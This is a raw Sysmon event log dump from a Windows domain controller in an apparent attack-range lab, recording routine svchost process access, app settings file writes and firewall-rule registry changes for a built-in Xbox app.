12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.582{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\MiracastView\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsefalse - rename failed with status 0xc0000022 23542300x80000000000000005627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.582{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.566{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.566 13241300x80000000000000005625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.566{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|M=microsoft.xboxgamecallableui_cw5n1h2txyewy|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|D=C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\|PFN=Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 23542300x80000000000000005624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.566{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.566{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{29E20594-C289-41D5-84ED-FE195B8F34BE}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.566{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A3F983BE-B33C-4CCC-AF0C-AD769014F6AF}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 13241300x80000000000000005621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.550{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{39CE84A6-C1E6-4C4B-BAD6-6846B736BF30}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 13241300x80000000000000005620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.550{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{6325CD78-1520-4724-ABB2-E91DAF3D94B5}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 11241100x80000000000000005619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.550{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.550 23542300x80000000000000005618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.550{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 